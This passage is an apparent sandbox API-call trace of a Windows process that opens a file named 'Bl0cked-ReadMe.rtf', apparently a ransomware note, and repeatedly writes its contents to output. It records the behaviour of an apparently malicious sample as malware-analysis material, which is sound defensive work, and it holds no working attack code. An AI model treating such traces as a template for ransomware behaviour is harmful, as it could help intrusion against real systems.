nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.875] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18f244, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f244) returned 0x240e80 [0192.875] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0192.875] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0192.875] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0192.875] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e150, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0192.875] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0192.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.876] GetFileType (hFile=0x54) returned 0x1 [0192.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.876] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e1a8 | out: lpFileSizeHigh=0x18e1a8*=0x0) returned 0x1632 [0192.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.876] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.876] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.876] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.876] GetFileType (hFile=0x4c) returned 0x1 [0192.876] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0192.876] GetFileType (hFile=0x4c) returned 0x1 [0192.876] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.876] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.877] GetFileType (hFile=0x4c) 
returned 0x1 [0192.877] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.878] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.878] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, 
lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] GetFileType (hFile=0x4c) returned 0x1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.878] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, 
lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.879] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.879] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] GetFileType (hFile=0x4c) returned 0x1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.879] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.880] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] GetFileType (hFile=0x4c) returned 0x1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.880] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.880] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0192.881] GetFileType (hFile=0x4c) returned 0x1 [0192.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.881] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.881] GetFileType (hFile=0x4c) returned 0x1 [0192.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.881] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.882] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.882] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, 
lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] GetFileType (hFile=0x4c) returned 0x1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.882] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: 
lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.883] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.883] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.883] GetFileType (hFile=0x4c) returned 0x1 [0192.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] GetFileType (hFile=0x4c) returned 0x1 [0192.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.884] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.884] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.884] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.885] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] 
GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] GetFileType (hFile=0x4c) returned 0x1 [0192.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.885] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 
